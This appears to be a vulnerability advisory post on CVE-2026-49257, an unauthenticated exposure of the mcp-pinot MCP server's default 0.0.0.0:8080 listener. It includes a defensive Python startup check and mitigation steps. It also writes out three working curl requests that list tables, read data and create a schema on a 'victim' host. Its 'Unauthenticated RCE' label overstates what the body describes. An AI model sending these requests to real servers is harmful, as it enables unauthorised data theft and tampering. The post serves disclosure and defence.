How CVE-2026-49257 Works
mcp-pinot is a Python-based Model Context Protocol (MCP) server for interacting with Apache Pinot. In versions 3.0.1 and below, the server defaults to running an HTTP MCP server bound to `0.0.0.0:8080` with no authentication enabled. This configuration exposes all 14 MCP tools—including SQL query execution, schema creation, and table-config mutation—to any network-adjacent caller.
The root cause is a combination of three insecure defaults. First, authentication is opt-in and defaults to off (`oauth_enabled: bool = False`). Second, the auth construction is gated by `oauth_enabled`; when it is false, `_auth` stays `None` and FastMCP registers all `@mcp.tool` endpoints with no authentication. Third, the default bind is all interfaces on a well-known port (`host: str = "0.0.0.0"`, `port: int = 8080`). Any operator following the README’s HTTP transport instructions ends up with a network-reachable MCP server with no auth.
The server proxies these calls using server-side Pinot credentials loaded from environment variables (`PINOT_TOKEN` or `PINOT_USERNAME`/`PINOT_PASSWORD`), typically those of a privileged service account. This creates a confused-deputy condition: the MCP server effectively launders the caller’s lack of identity into the server’s privileges against the upstream cluster. An unauthenticated attacker can invoke `read_query` to execute arbitrary SELECT statements, `create_schema` to create or mutate schemas, `update_table_config` to modify table configurations, and even `reload_table_filters` to leak filter lists. The CVSS score is 10.0 Critical, with Attack Vector: Network, Attack Complexity: Low, Privileges Required: None, User Interaction: None, Scope: Changed, and High impact on Confidentiality, Integrity, and Availability.
The vulnerability was fixed in v3.1.0, released 2026-05-25, by changing the default HTTP bind host to `127.0.0.1`, refusing non-loopback HTTP/HTTPS exposure unless OAuth is enabled, making Helm exposure opt-in and OAuth-gated, and adding parser-backed single-statement read-only validation for `read_query`.
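The fail-closed startup check that the fix describes (no non-loopback HTTP/HTTPS listener unless OAuth is on), written out as an added Python example; it is not mcp-pinot's own code. `ServerConfig`, `is_loopback`, `check_exposure` and `config_from_env` are hypothetical names, and only the `MCP_HOST` and `OAUTH_ENABLED` variables and the quoted defaults come from this post.

```python
import ipaddress
from dataclasses import dataclass
from typing import Mapping, Optional


@dataclass
class ServerConfig:
    """Hypothetical settings object; field names follow the defaults quoted above."""
    transport: str = "http"
    host: str = "127.0.0.1"   # post-fix default; 3.0.1 and below used 0.0.0.0
    port: int = 8080
    oauth_enabled: bool = False


def is_loopback(host: str) -> bool:
    """True only for names/addresses that are reachable from this machine alone."""
    if host.strip().lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host.strip().strip("[]")).is_loopback
    except ValueError:
        # Empty string or DNS name: assume it is reachable (fail closed).
        return False


def check_exposure(cfg: ServerConfig) -> Optional[str]:
    """Return a refusal reason, or None when the listener is safe to start."""
    if cfg.transport not in ("http", "https"):
        return None                      # no network listener to protect
    if is_loopback(cfg.host) or cfg.oauth_enabled:
        return None
    return (f"refusing to bind {cfg.host}:{cfg.port} without authentication: "
            "set OAUTH_ENABLED=true or MCP_HOST=127.0.0.1")


def config_from_env(env: Mapping[str, str]) -> ServerConfig:
    """Build the config from the two environment variables named in this post."""
    return ServerConfig(
        host=env.get("MCP_HOST", ServerConfig.host),
        oauth_enabled=env.get("OAUTH_ENABLED", "").strip().lower() == "true",
    )


if __name__ == "__main__":
    # Constructed environments: the old default, the workaround, and OAuth on.
    for env in ({"MCP_HOST": "0.0.0.0"}, {"MCP_HOST": "127.0.0.1"},
                {"MCP_HOST": "0.0.0.0", "OAUTH_ENABLED": "true"}):
        print(env, "->", check_exposure(config_from_env(env)) or "ok")
```

Running the check before the listener is created means a misconfigured deployment fails at startup instead of serving tools unauthenticated.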
DailyCVE Form:
Platform: mcp-pinot
Version: <=3.0.1
Vulnerability: Unauthenticated RCE
Severity: Critical (10.0)
date: 2026-05-23
Prediction: 2026-05-25
What Undercode Say:
Analytics:
- Default Exposure: Server binds to `0.0.0.0:8080` with `oauth_enabled=False`.
- Confused Deputy: Server-side credentials are reused for all requests.
- Attack Surface: All 14 MCP tools are exposed without authentication.
- CVSS: 10.0 Critical (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Bash Commands & Codes:
1. Enumerate tables (no Authorization header)
curl -X POST http://victim:8080/mcp \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{"name":"list_tables","arguments":{}},
"id":1
}'
2. Read arbitrary table contents
curl -X POST http://victim:8080/mcp \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{
"name":"read_query",
"arguments":{"query":"SELECT * FROM <table> LIMIT 100"}
},
"id":2
}'
3. Create a new schema (write privileges)
curl -X POST http://victim:8080/mcp \
-H 'Content-Type: application/json' \
-d '{
"jsonrpc":"2.0",
"method":"tools/call",
"params":{
"name":"create_schema",
"arguments":{
"schemaJson":"{\"schemaName\":\"attacker_schema\",\"dimensionFieldSpecs\":[{\"name\":\"id\",\"dataType\":\"STRING\"}]}"
}
},
"id":3
}'
Exploit:
An unauthenticated attacker can send crafted HTTP POST requests to the `/mcp` endpoint. By invoking the `read_query` tool, they can execute arbitrary SQL queries against the Pinot cluster using the server’s privileged credentials. Additionally, they can use `create_schema`, `update_schema`, `create_table_config`, and `update_table_config` to modify the cluster’s schema and table configurations, potentially leading to data corruption or denial of service. The `reload_table_filters` tool can also be abused to leak internal filter lists.
Protection:
- Upgrade to v3.1.0 immediately.
- If upgrading is not possible, set `MCP_HOST=127.0.0.1` to restrict the server to localhost only.
- Enable OAuth by setting `OAUTH_ENABLED=true` in the environment.
- Avoid exposing the server to untrusted networks without proper authentication.
- Implement network-level restrictions (e.g., firewall rules) to limit access to the MCP server port.
Impact:
Successful exploitation grants an attacker full read and write access to the configured Pinot cluster. This includes the ability to:
– Read any table data and cluster metadata.
– Create or update schemas and table configurations.
– Execute expensive queries that can degrade or disrupt cluster availability.
– Reload server filter files, leaking sensitive filter lists.
– Perform cluster diagnostics, revealing host, port, scheme, database, and auth-mode information.
The vulnerability is particularly dangerous because it requires no user interaction and no privileges, and it allows the attacker to pivot from the MCP server to the upstream Pinot cluster with the server’s own high-privilege credentials.
Sources:
Reported By: github.com

